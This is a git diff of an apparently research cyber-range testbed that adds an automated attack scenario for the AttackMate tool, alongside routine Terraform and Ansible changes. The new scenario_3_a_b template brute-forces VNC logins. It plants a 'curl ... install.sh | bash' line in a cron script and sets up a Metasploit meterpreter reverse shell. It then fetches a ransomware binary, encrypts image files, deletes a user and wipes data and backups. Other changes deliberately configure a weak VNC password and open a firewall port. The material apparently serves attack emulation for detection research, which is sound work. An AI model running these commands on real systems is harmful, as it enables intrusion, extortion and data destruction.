diff --git a/ansible/run/scenario3/main.yml b/ansible/run/scenario3/main.yml index 88e74a6..7c9faeb 100644 --- a/ansible/run/scenario3/main.yml +++ b/ansible/run/scenario3/main.yml @@ -37,6 +37,7 @@ mode: '0755' loop: - scenario_3_a_a + - scenario_3_a_b - upgrade - scenario_3_b - scenario_3_c @@ -61,18 +62,30 @@ - attackmate - exploit - - name: "Run Scenario 3 b" + - name: "Run Scenario 3 a b" become: True become_user: "{{attacker_user}}" ansible.builtin.shell: - cmd: "/usr/local/bin/attackmate-tmux scenario_3_b.yml" + cmd: "/usr/local/bin/attackmate-tmux scenario_3_a_b.yml" chdir: "{{user_home.stdout}}" tags: - - scenario_3_b + - scenario_3_a_b - metasploit - attackmate - exploit - + + - name: "Run Scenario 3 b" + become: True + become_user: "{{attacker_user}}" + ansible.builtin.shell: + cmd: "/usr/local/bin/attackmate-tmux scenario_3_b.yml" + chdir: "{{user_home.stdout}}" + tags: + - scenario_3_b + - metasploit + - attackmate + - exploit + - name: "Run Scenario 3 c" become: True become_user: "{{attacker_user}}" @@ -84,7 +97,7 @@ - metasploit - attackmate - exploit - + - name: "Run Scenario 3 d" become: True become_user: "{{attacker_user}}" @@ -96,3 +109,4 @@ - metasploit - attackmate - exploit + diff --git a/ansible/run/scenario3/templates/scenario_3_a_a.j2 b/ansible/run/scenario3/templates/scenario_3_a_a.j2 index 0740e54..7cb51dd 100644 --- a/ansible/run/scenario3/templates/scenario_3_a_a.j2 +++ b/ansible/run/scenario3/templates/scenario_3_a_a.j2 @@ -1,6 +1,6 @@ #################### # -# Scenario 1 a a +# Scenario 3 a a # #################### vars: diff --git a/ansible/run/scenario3/templates/scenario_3_a_b.j2 b/ansible/run/scenario3/templates/scenario_3_a_b.j2 new file mode 100644 index 0000000..4bad312 --- /dev/null +++ b/ansible/run/scenario3/templates/scenario_3_a_b.j2 @@ -0,0 +1,173 @@ +#################### +# +# Scenario 3 a b +# +#################### + +vars: + $SERVER_ADDRESS: 192.42.0.254 + $ATTACKER_ADDRESS: 192.42.1.174 + $DNS_SERVER: 192.42.0.233 + $LISTA: + - "password1" + - "password2" + - "password3" + - "password4" + - "password5" + - "123" + - "12345" + - "12345678" + +commands: + - type: loop + break_if: $RESULT_STDOUT =~ vnc_connected + cmd: "items(LISTA)" + commands: + - type: vnc + creates_session: foothold + username: john + password: $LOOP_ITEM + hostname: $SERVER_ADDRESS + port: "5901" + cmd: move + x: 5 + y: 5 + + - type: vnc + session: foothold + cmd: click + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: type + input: "terminal" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: key + key: "enter" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: type + input: "sudo -i" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: key + key: "enter" + + - type: sleep + seconds: 2 + + - type: vnc + session: foothold + cmd: type + input: echo "curl http://$ATTACKER_ADDRESS:8888/install.sh | bash" >> /media/share/healthcheck_cron.sh + + - type: sleep + seconds: 2 + + - type: vnc + session: foothold + cmd: key + key: "enter" + + - type: sleep + seconds: 1 + + - type: mktemp + cmd: file + variable: RSHELL + + - type: msf-payload + cmd: cmd/unix/python/meterpreter/reverse_tcp + payload_options: + LHOST: $ATTACKER_ADDRESS + LPORT: "4444" + local_path: $RSHELL + + - type: msf-module + creates_session: movement + cmd: exploit/multi/handler + payload: "cmd/unix/python/meterpreter/reverse_tcp" + payload_options: + LHOST: $ATTACKER_ADDRESS + LPORT: "4444" + background: true + kill_on_exit: true + + - type: webserv + local_path: $RSHELL + port: 8888 + background: True + kill_on_exit: true + + - type: vnc + cmd: close + session: foothold + +#################### MOVED ############################################ + - type: msf-session + session: movement + cmd: sysinfo + + - type: msf-session + session: movement + cmd: getuid + + - type: msf-session + session: movement + cmd: shell + + # Prepare for upgradeshell + - type: setvar + cmd: movement + variable: $UPGRADESESSION + + - type: include + local_path: upgrade.yml + + - type: msf-session + session: movement + cmd: curl http://$ATTACKER_ADDRESS/donotcry > /opt/donotcry + + - type: msf-session + session: movement + cmd: /lib64/ld-linux-x86-64.so.2 /opt/donotcry encrypt /media/data/Images + + - type: msf-session + session: movement + cmd: find /media/data/Images + + - type: msf-session + session: movement + cmd: cat /etc/passwd + + - type: msf-session + session: movement + cmd: userdel -f john + + - type: msf-session + session: movement + cmd: rm -rf /media/data/* + + - type: msf-session + session: movement + cmd: rm -rf /var/backups/* + + - type: msf-session + session: movement + cmd: systemctl stop exim4.service + diff --git a/ansible/run/scenario3/templates/scenario_3_b.j2 b/ansible/run/scenario3/templates/scenario_3_b.j2 index 60e3ce8..2a6fc47 100644 --- a/ansible/run/scenario3/templates/scenario_3_b.j2 +++ b/ansible/run/scenario3/templates/scenario_3_b.j2 @@ -1,6 +1,6 @@ #################### # -# Scenario 1 a a +# Scenario 3 b # #################### vars: diff --git a/ansible/run/scenario3/templates/scenario_3_c.j2 b/ansible/run/scenario3/templates/scenario_3_c.j2 index 2ce93b7..7310b49 100644 --- a/ansible/run/scenario3/templates/scenario_3_c.j2 +++ b/ansible/run/scenario3/templates/scenario_3_c.j2 @@ -1,6 +1,6 @@ #################### # -# Scenario 1 a a +# Scenario 3 c # #################### vars: diff --git a/packer/firewall/playbook/main.yaml b/packer/firewall/playbook/main.yaml index 1c92bc7..83bef6b 100644 --- a/packer/firewall/playbook/main.yaml +++ b/packer/firewall/playbook/main.yaml @@ -83,6 +83,7 @@ - { action: DNAT, source: inet, dest: "dmz:$REPOSERVER:22", proto: tcp, dest_port: 10022 } - { action: DNAT, source: inet, dest: "dmz:$REPOSERVER", proto: tcp, dest_port: 3389 } - { action: DNAT, source: inet, dest: "dmz:$REPOSERVER", proto: tcp, dest_port: 4501 } + - { action: DNAT, source: inet, dest: "dmz:$REPOSERVER", proto: tcp, dest_port: 5901 } - Reposerver to Linux-Share - { action: ACCEPT, source: dmz, dest: "lan:$LINUXSHARE", proto: tcp, dest_port: 1881 } - { action: ACCEPT, source: dmz, dest: "lan:$LINUXSHARE", proto: tcp, dest_port: 111,2049 } diff --git a/packer/repository/playbook/main.yaml b/packer/repository/playbook/main.yaml index d51577a..e992f7c 100644 --- a/packer/repository/playbook/main.yaml +++ b/packer/repository/playbook/main.yaml @@ -26,6 +26,11 @@ hostname_fqdn: "puppet.aecid-testbed.local" hostname_ip: "172.17.100.122" - role: aeciduser + - role: weaklinuxuser + vars: + weaklinuxuser_sudo: False + weaklinuxuser_groups: + - sudo vars: # pass: aecid aeciduser_pass: "$6$9AqxTPJqYsFXwgPN$xAC4y1Vndk00EaBCuFcJC37BYDYYVAgt9SHymg15KSdKddZnwG.SsQaJvHarH4DYQj3tuboeLa4G5EfL7itcC0" @@ -35,11 +40,12 @@ - role: manage_unattended_upgrades - role: auditd - role: mate-desktop - - role: weaklinuxuser + - role: tightvnc vars: - weaklinuxuser_sudo: False - weaklinuxuser_groups: - - sudo + vnc_user: "john" + vnc_password: "12345678" + vnc_display: ":1" + vnc_port: 5901 - role: puppetserver - role: disableresolved - role: acct diff --git a/packer/repository/playbook/requirements.yml b/packer/repository/playbook/requirements.yml index 3a3269b..eea2d34 100644 --- a/packer/repository/playbook/requirements.yml +++ b/packer/repository/playbook/requirements.yml @@ -44,4 +44,6 @@ roles: - src: https://github.com/ait-testbed/atb-ansible-puppetserver.git version: v1.0.0 name: puppetserver - + - src: https://github.com/ait-testbed/atb-ansible-tightvnc.git + version: v1.0.0 + name: tightvnc diff --git a/terragrunt/attacker/module/fetch_network_uuid.sh b/terragrunt/attacker/module/fetch_network_uuid.sh new file mode 100644 index 0000000..7357333 --- /dev/null +++ b/terragrunt/attacker/module/fetch_network_uuid.sh @@ -0,0 +1,18 @@ +#!/bin/bash + +# Exit if any of the intermediate steps fail +set -e + +# Extract "network_name" arguments from the input into +# NETWORK_NAME and shell variables. +# jq will ensure that the values are properly quoted +# and escaped for consumption by the shell. +eval "$(jq -r '@sh "NETWORK_NAME=\(.network_name)"')" + +# data fetching +UUID=$(openstack network list --project "$OS_PROJECT_ID" --name "$NETWORK_NAME" -f value -c ID) + +# Safely produce a JSON object containing the result value. +# jq will ensure that the value is properly quoted +# and escaped to produce a valid JSON string. +jq -n --arg uuid "$UUID" '{"uuid":$uuid}' \ No newline at end of file diff --git a/terragrunt/bootstrap/module/main.tf b/terragrunt/bootstrap/module/main.tf index 259b33f..caf308b 100644 --- a/terragrunt/bootstrap/module/main.tf +++ b/terragrunt/bootstrap/module/main.tf @@ -69,7 +69,7 @@ resource "openstack_compute_instance_v2" "inet-dns" { user_data = local.ext_dns_userdata_file == null ? null : data.template_cloudinit_config.cloudinitdns[0].rendered network { - name = "internet" + uuid = "${openstack_networking_network_v2.internet.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["inet"],514) } @@ -220,27 +220,27 @@ resource "openstack_compute_instance_v2" "inet-fw" { user_data = local.fw_userdata_file == null ? null : data.template_cloudinit_config.cloudinitinetfw[0].rendered network { - name = "internet" + uuid = "${openstack_networking_network_v2.internet.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["inet"],254) } network { - name = "lan" + uuid = "${openstack_networking_network_v2.lan.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["lan"],254) } network { - name = "dmz" + uuid = "${openstack_networking_network_v2.dmz.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["dmz"],254) } network { - name = "admin" + uuid = "${openstack_networking_network_v2.admin.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["admin"],254) } network { - name = "user" + uuid = "${openstack_networking_network_v2.user.id}" fixed_ip_v4 = cidrhost(var.subnet_cidrs["user"],254) } @@ -298,30 +298,32 @@ resource "openstack_compute_instance_v2" "mgmt" { user_data = local.mgmt_userdata_file == null ? null : data.template_cloudinit_config.cloudinitmgmt[0].rendered network { - name = "internet" + uuid = "${openstack_networking_network_v2.internet.id}" fixed_ip_v4 = local.mgmt_ips.internet } network { - name = "lan" + uuid = "${openstack_networking_network_v2.lan.id}" fixed_ip_v4 = local.mgmt_ips.lan } network { - name = "dmz" + uuid = "${openstack_networking_network_v2.dmz.id}" fixed_ip_v4 = local.mgmt_ips.dmz } + network { - name = "admin" + uuid = "${openstack_networking_network_v2.admin.id}" fixed_ip_v4 = local.mgmt_ips.admin } network { - name = "user" + uuid = "${openstack_networking_network_v2.user.id}" fixed_ip_v4 = local.mgmt_ips.user } + depends_on = [ openstack_networking_network_v2.dmz, openstack_networking_network_v2.internet, diff --git a/terragrunt/bootstrap/terragrunt.hcl b/terragrunt/bootstrap/terragrunt.hcl index 3e52381..7af7c4f 100644 --- a/terragrunt/bootstrap/terragrunt.hcl +++ b/terragrunt/bootstrap/terragrunt.hcl @@ -11,10 +11,10 @@ inputs = { host_userdata = "firewallinit.yml" ext_router = "taq-router" sshkey = "testbed-key" - inetdns_image = "ubuntu-2204" + inetdns_image = "Ubuntu 22.04" inetfw_image = "atb-fw-inet-lan-dmz-image-2023-08-24T13-50-01Z" - mgmt_image = "ubuntu-2204" - floating_pool = "provider-aecid-208" + mgmt_image = "Ubuntu 22.04" + floating_pool = "AECID-provider-network" } diff --git a/terragrunt/fetch_network_uuid.sh b/terragrunt/fetch_network_uuid.sh new file mode 100755 index 0000000..7357333 --- /dev/null +++ b/terragrunt/fetch_network_uuid.sh @@ -0,0 +1,18 @@ +#!/bin/bash + +# Exit if any of the intermediate steps fail +set -e + +# Extract "network_name" arguments from the input into +# NETWORK_NAME and shell variables. +# jq will ensure that the values are properly quoted +# and escaped for consumption by the shell. +eval "$(jq -r '@sh "NETWORK_NAME=\(.network_name)"')" + +# data fetching +UUID=$(openstack network list --project "$OS_PROJECT_ID" --name "$NETWORK_NAME" -f value -c ID) + +# Safely produce a JSON object containing the result value. +# jq will ensure that the value is properly quoted +# and escaped to produce a valid JSON string. +jq -n --arg uuid "$UUID" '{"uuid":$uuid}' \ No newline at end of file diff --git a/terragrunt/terragrunt.hcl b/terragrunt/terragrunt.hcl index 0c570c5..7b1351b 100644 --- a/terragrunt/terragrunt.hcl +++ b/terragrunt/terragrunt.hcl @@ -1,9 +1,9 @@ remote_state { backend = "http" config = { - address = "https://git-service.ait.ac.at/api/v4/projects/2197/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}" - lock_address = "https://git-service.ait.ac.at/api/v4/projects/2197/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}/lock" - unlock_address = "https://git-service.ait.ac.at/api/v4/projects/2197/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}/lock" + address = "https://git-service.ait.ac.at/api/v4/projects/3012/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}" + lock_address = "https://git-service.ait.ac.at/api/v4/projects/3012/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}/lock" + unlock_address = "https://git-service.ait.ac.at/api/v4/projects/3012/terraform/state/${get_env("OS_PROJECT_NAME")}_${get_env("OS_USER_DOMAIN_NAME")}_${path_relative_to_include()}_${basename(get_repo_root())}/lock" username = "${get_env("GITLAB_USERNAME")}" password = "${get_env("CR_GITLAB_ACCESS_TOKEN")}" lock_method = "POST" diff --git a/terragrunt/videoserver/module/adminpc.tf b/terragrunt/videoserver/module/adminpc.tf index 9fcb02c..b7be984 100644 --- a/terragrunt/videoserver/module/adminpc.tf +++ b/terragrunt/videoserver/module/adminpc.tf @@ -6,6 +6,15 @@ locals { # # CREATE INSTANCE for "ADMINPC" # + +data "external" "admin_uuid" { + program = ["bash", "./fetch_network_uuid.sh"] + + query = { + network_name = "admin" + } +} + data "template_file" "userdata_adminpc" { template = "${file("${local.ext_adminpc_userdata_file}")}" } @@ -35,7 +44,7 @@ resource "openstack_compute_instance_v2" "adminpc" { user_data = local.ext_adminpc_userdata_file == null ? null : data.template_cloudinit_config.cloudinitadminpc[0].rendered network { - name = "admin" + uuid = "${data.external.admin_uuid.result.uuid}" fixed_ip_v4 = cidrhost(var.admin_cidr,222) } diff --git a/terragrunt/videoserver/module/adminpc_variables.tf b/terragrunt/videoserver/module/adminpc_variables.tf index 0f74207..533b4ee 100644 --- a/terragrunt/videoserver/module/adminpc_variables.tf +++ b/terragrunt/videoserver/module/adminpc_variables.tf @@ -6,7 +6,7 @@ variable "adminpc_image" { variable "adminpc_flavor" { type = string description = "flavor of the adminpc host" - default = "m1.small" + default = "d2-2" } variable "adminpc_userdata" { diff --git a/terragrunt/videoserver/module/dnsserver.tf b/terragrunt/videoserver/module/dnsserver.tf index 5a184a1..a169967 100644 --- a/terragrunt/videoserver/module/dnsserver.tf +++ b/terragrunt/videoserver/module/dnsserver.tf @@ -6,6 +6,15 @@ locals { # # CREATE INSTANCE for "DNS-Server" # + +data "external" "internet_uuid" { + program = ["bash", "./fetch_network_uuid.sh"] + + query = { + network_name = "internet" + } +} + data "template_file" "userdata_dnsserver" { template = "${file("${local.ext_dnsserver_userdata_file}")}" } @@ -35,7 +44,7 @@ resource "openstack_compute_instance_v2" "dnsserver" { user_data = local.ext_dnsserver_userdata_file == null ? null : data.template_cloudinit_config.cloudinitdnsserver[0].rendered network { - name = "internet" + uuid = "${data.external.internet_uuid.result.uuid}" fixed_ip_v4 = cidrhost(var.inet_cidr,233) } diff --git a/terragrunt/videoserver/module/dnsserver_variables.tf b/terragrunt/videoserver/module/dnsserver_variables.tf index 629299a..39d727f 100644 --- a/terragrunt/videoserver/module/dnsserver_variables.tf +++ b/terragrunt/videoserver/module/dnsserver_variables.tf @@ -6,7 +6,7 @@ variable "dnsserver_image" { variable "dnsserver_flavor" { type = string description = "flavor of the dnsserver host" - default = "m1.small" + default = "d2-2" } variable "dnsserver_userdata" { diff --git a/terragrunt/videoserver/module/fetch_network_uuid.sh b/terragrunt/videoserver/module/fetch_network_uuid.sh new file mode 100644 index 0000000..7357333 --- /dev/null +++ b/terragrunt/videoserver/module/fetch_network_uuid.sh @@ -0,0 +1,18 @@ +#!/bin/bash + +# Exit if any of the intermediate steps fail +set -e + +# Extract "network_name" arguments from the input into +# NETWORK_NAME and shell variables. +# jq will ensure that the values are properly quoted +# and escaped for consumption by the shell. +eval "$(jq -r '@sh "NETWORK_NAME=\(.network_name)"')" + +# data fetching +UUID=$(openstack network list --project "$OS_PROJECT_ID" --name "$NETWORK_NAME" -f value -c ID) + +# Safely produce a JSON object containing the result value. +# jq will ensure that the value is properly quoted +# and escaped to produce a valid JSON string. +jq -n --arg uuid "$UUID" '{"uuid":$uuid}' \ No newline at end of file diff --git a/terragrunt/videoserver/module/videoserver.tf b/terragrunt/videoserver/module/videoserver.tf index 15c1321..734513a 100644 --- a/terragrunt/videoserver/module/videoserver.tf +++ b/terragrunt/videoserver/module/videoserver.tf @@ -6,6 +6,15 @@ locals { # # CREATE INSTANCE for "VIDEOSERVER" # + +data "external" "dmz_uuid" { + program = ["bash", "./fetch_network_uuid.sh"] + + query = { + network_name = "dmz" + } +} + data "template_file" "userdata_videoserver" { template = "${file("${local.ext_videoserver_userdata_file}")}" } @@ -35,7 +44,7 @@ resource "openstack_compute_instance_v2" "videoserver" { user_data = local.ext_videoserver_userdata_file == null ? null : data.template_cloudinit_config.cloudinitvideoserver[0].rendered network { - name = "dmz" + uuid = "${data.external.dmz_uuid.result.uuid}" fixed_ip_v4 = cidrhost(var.dmz_cidr,121) } diff --git a/terragrunt/videoserver/module/videoserver_variables.tf b/terragrunt/videoserver/module/videoserver_variables.tf index 4b4f250..61ee45a 100644 --- a/terragrunt/videoserver/module/videoserver_variables.tf +++ b/terragrunt/videoserver/module/videoserver_variables.tf @@ -6,7 +6,7 @@ variable "videoserver_image" { variable "videoserver_flavor" { type = string description = "flavor of the videoserver host" - default = "m1.small" + default = "d2-2" } variable "videoserver_userdata" { diff --git a/terragrunt/videoserver/module/webcam.tf b/terragrunt/videoserver/module/webcam.tf index 426857c..50a0b85 100644 --- a/terragrunt/videoserver/module/webcam.tf +++ b/terragrunt/videoserver/module/webcam.tf @@ -6,6 +6,7 @@ locals { # # CREATE INSTANCE for "Webcam-Server" # + data "template_file" "userdata_webcam" { template = "${file("${local.ext_webcam_userdata_file}")}" } @@ -35,7 +36,7 @@ resource "openstack_compute_instance_v2" "webcam" { user_data = local.ext_webcam_userdata_file == null ? null : data.template_cloudinit_config.cloudinitwebcam[0].rendered network { - name = "dmz" + uuid = "${data.external.dmz_uuid.result.uuid}" fixed_ip_v4 = cidrhost(var.dmz_cidr,80) } diff --git a/terragrunt/videoserver/module/webcam_variables.tf b/terragrunt/videoserver/module/webcam_variables.tf index b2b8d83..5536b81 100644 --- a/terragrunt/videoserver/module/webcam_variables.tf +++ b/terragrunt/videoserver/module/webcam_variables.tf @@ -6,7 +6,7 @@ variable "webcam_image" { variable "webcam_flavor" { type = string description = "flavor of the webcam host" - default = "m1.small" + default = "d2-2" } variable "webcam_userdata" {